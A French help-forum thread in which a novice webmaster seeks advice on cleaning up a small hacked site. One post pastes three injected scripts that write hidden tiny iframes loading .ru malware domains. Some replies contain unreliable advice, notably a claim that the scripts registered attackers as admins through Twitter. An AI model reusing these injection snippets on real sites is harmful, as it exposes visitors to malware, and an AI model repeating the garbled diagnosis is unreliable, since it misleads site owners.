Piratage de mon site

Résolu/Fermé
grominnetto Messages postés 52 Date d'inscription mardi 6 novembre 2007 Statut Membre Dernière intervention 21 août 2013 - 22 juil. 2012 à 23:18
grominnetto Messages postés 52 Date d'inscription mardi 6 novembre 2007 Statut Membre Dernière intervention 21 août 2013 - 1 août 2012 à 19:45
Bonjour,





Je suis un peu confus....Suite à la demande d'un ami, je lui ai fabriqué un petit site web pour son école de hockey: hockeychristianlauzon.hostei.com/ avec dreamweaver sous 000webhost et le transfert via filezilla

Comme il voulait y ajouter des statistiques à chaques semaines, je lui ai laissé tout les coordonnées: mot de passe et tout!!

La semaine dernière, je voulais voir le site car mon neveu y joumaise...Quel Choc!!!

1- Le site a été piraté, il me ramène au moteur de recherche de BING constamment

2- Après quelques recherches, je constate trois javascript qui parlent de Pinkpiller, de Greenpiller et de Orangemoth...tous ont .ru

3- Je constate aussi que le codage en a mangé un coup...je ne suis pas un grand connaisseur...mais il me l'a tout chambardé....faillait s'y attendre!!


Maintenant: après avoir tout enlevé les scripts, l'avoir refait examiné par les outils de Google webmaster, je me demande bien si mon site va ME revenir en bon étât!!

Ma grosse question: Comment faire et Quoi faire pour que cela ne se reproduise pas???

Un Gros merci, car je suis un peu submergé...comme un peu au dessus de mes connaissances...mais je vais en apprendre encore davantage ainsi!!!
A voir également:

11 réponses

bg62 Messages postés 23590 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 15 avril 2024 2 362
Modifié par bg62 le 24/07/2012 à 15:50
si tu n'as pas installé de BDD
- changer tous les mots de passe
- désinfecter ton pc
- effacer TOUT ce qui est sur l'hébergeur
- remettre une version saine en ligne
- faire une demande de révision auprès des services de google
... pour commencer ;)
https://longuetraine.fr/index.php?article792/il-est-possible-que-ce-site-ait-ete-pirate-avertissement-google
https://longuetraine.fr/?article373/google-webmaster-tools-outil-pour-les-malwares
https://longuetraine.fr/index.php?article539/page-malveillante-site-bloque-et-sanction-de-google-solutions-pour-les-webmasters
le 'www' est fait aussi pour communiquer, partager et échanger, non ?
merci d'avoir la politesse de répondre à ceux qui essaient de vous aider
2
greg160 Messages postés 621 Date d'inscription lundi 28 juin 2010 Statut Membre Dernière intervention 21 septembre 2017 188
22 juil. 2012 à 23:23
Peux-tu obtenir les sources HTLM?
Une faille javascript y est surement introduite
0
graffx Messages postés 6506 Date d'inscription jeudi 22 mars 2007 Statut Contributeur Dernière intervention 24 mars 2019 1 973
22 juil. 2012 à 23:35
A premiere vue, la seule page dynamique serait la page "contactez-nous", as tu pensé a securiser ton formulaire avant le traitement ?
0
grominnetto Messages postés 52 Date d'inscription mardi 6 novembre 2007 Statut Membre Dernière intervention 21 août 2013
22 juil. 2012 à 23:55
Greg: Voici les scripts que j'ai trouvé sur chaque page, un par page:


/*c3284d*/
document.write('<iframe src="http://orangemoth.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
/*/c3284d*/




/*c3284d*/
document.write('<iframe src="http://pinkpillar.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
/*/c3284d*/




/*c3284d*/
document.write('<iframe src="http://greenpillar.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
/*/c3284d*/
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
grominnetto Messages postés 52 Date d'inscription mardi 6 novembre 2007 Statut Membre Dernière intervention 21 août 2013
22 juil. 2012 à 23:58
Graffix: Désolé mais j'ai eu un cours très de base et sécuriser son site ne faisait pas partie de mon cours évidemment. La seule manière que j'ai sécuriser, d'une certaine manière un site, était d'empêcher le copier coller sur un site de lutte (catch)....Autrement, je n'y connais rien....

Si tu as des idées ou des trucs, tout est bienvenus!!!

Merci!!!!
0
greg160 Messages postés 621 Date d'inscription lundi 28 juin 2010 Statut Membre Dernière intervention 21 septembre 2017 188
Modifié par greg160 le 23/07/2012 à 16:52
Les scripts disent qu'il se sont enregistres par twitter dans le site.
En gros ils ont enregistrés leur IP dans la liste des droits admins!!!
Je ne vois qu'une seule solution:

Empêche tout ce qui vient de l'exterieur et qui est écrit (commentaire le j'aime de facebook, twitter etc...)

TOUT CEUX QUI PASSENT PAR LE LIEN TWITTER SERONT PIRATES!!!
Greg160
0
grominnetto Messages postés 52 Date d'inscription mardi 6 novembre 2007 Statut Membre Dernière intervention 21 août 2013
23 juil. 2012 à 18:32
Je dois attendre si les gens sont prêts à payer pour le refaire!

mais....

Comment fait-on pour empêcher les gens de l'extérieur?

et

Si je prend tout les fichiers html que j'ai et que je les remets en circulation, est-ce la bonne solution? Sont-ils quand même infectés?

Merci
0
grominnetto Messages postés 52 Date d'inscription mardi 6 novembre 2007 Statut Membre Dernière intervention 21 août 2013
26 juil. 2012 à 00:24
Pendant que j'attends la réponse de l'école de hockey (de ce site), je me demande si j'ai bien compris:

1- Je dois changer le mot de passe sur 00webhost pour connecter filezilla? FAIT

2- Le gestionnaire du site doit désinfecter son ordi? si je peux lui parler, cela risque de ce faire

3- Je peux reprendre toutes les données à partir de filezilla et les transférer sur MON ordi? FAIT

4- Je dois installer un antivirus sur mon serveur...ex: Webdefender....je vais chercher

5- Dois-je protéger mon (et mes sites) davantage pour empêcher quelconques infiltrations?

Merci bien de m'aider...cela me permet d'apprendre énormément!!!!
0
bg62 Messages postés 23590 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 15 avril 2024 2 362
26 juil. 2012 à 11:05
1- Je dois changer le mot de passe sur 00webhost pour connecter filezilla? FAIT

2- Le gestionnaire du site doit désinfecter son ordi? si je peux lui parler, cela risque de ce faire

3- Je peux reprendre toutes les données à partir de filezilla et les transférer sur MON ordi? FAIT

4- Je dois installer un antivirus sur mon serveur...ex: Webdefender....je vais chercher

5- Dois-je protéger mon (et mes sites) davantage pour empêcher quelconques infiltrations? 

2 : à faire et lui demander de désinfecter aussi sonpc !
3 : scanner le tout à la recherche de ....
4 - ça n'existe pas !!! tu peux faire des tests en ligne, ou QUAND TOUT SERA SUR ET CERTAIN OK installer crawlprotect
antivirus et antimalware fonctionnent sur le pc pas sur le site ;)
0
grominnetto Messages postés 52 Date d'inscription mardi 6 novembre 2007 Statut Membre Dernière intervention 21 août 2013
26 juil. 2012 à 21:35
SCANNER: désolé, mais ce programme fait quoi au juste? Je l'ai téléchargé et j'ai scanné...et je n'ai pas saisi le but....désolé

CRAWLPROTECT: semble très intéressant, mais il semble que je doive avoir une base de données et avec sql....je n'ai pas de base de données.....mais je prend note du programme.

Merci de ton aide...et de tes idées
0
bg62 Messages postés 23590 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 15 avril 2024 2 362
28 juil. 2012 à 11:58
- le lien vers "scanner" est un lien interne à ccm ...
- sur ton serveur tu ne peux pas installer une BDD ???
0
grominnetto Messages postés 52 Date d'inscription mardi 6 novembre 2007 Statut Membre Dernière intervention 21 août 2013
28 juil. 2012 à 19:16
Disons que mes connaissances s'arrêtent au html....pour l'instant....
0
bg62 Messages postés 23590 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 15 avril 2024 2 362
29 juil. 2012 à 16:03
dans ce cas ... mal parti ... ou trouve qq pour te le faire ;)
0
grominnetto Messages postés 52 Date d'inscription mardi 6 novembre 2007 Statut Membre Dernière intervention 21 août 2013
29 juil. 2012 à 18:17
1- Le propriétaire de l'école de hockey m'a dit qu'il a quelqu'un pour le refaire à neuf....mais a-t-il quelqu'un pour gérer son site mieux que celui qui le gère actuellement (ses pages sont rendues à des milliers de lignes....ayoye!!)?

2- Je commence à apprendre le sql tranquillement!!!
0
grominnetto Messages postés 52 Date d'inscription mardi 6 novembre 2007 Statut Membre Dernière intervention 21 août 2013
1 août 2012 à 19:45
Je confirme: définitivement résolu...tout fonctionne!!! un peu grâce à vous!!!


Merci de votre aide!!!
0
Utilisateur anonyme
23 juil. 2012 à 03:45
Premièrement il te faut absolument changer tes mots de passe FTP.
Ensuite je te conseil de passer ton ordi avec un antivirus, certains virus envoient les accès FTP au hacker.
Installe un antivirus sur ton serveur, comme webdefender, il te préviendra dès qu'une activité suspect sera détectée.

Bon courage.
-1
grominnetto Messages postés 52 Date d'inscription mardi 6 novembre 2007 Statut Membre Dernière intervention 21 août 2013
23 juil. 2012 à 06:00
J'ai déjà changé le mot de passe sur 000webhost pour Filezilla
Et j'attends de parler à celui qui fait gestion de ce site

Et maintenant, j'attends aussi de voir si les problèmes se règlent!!!

Merci!!
0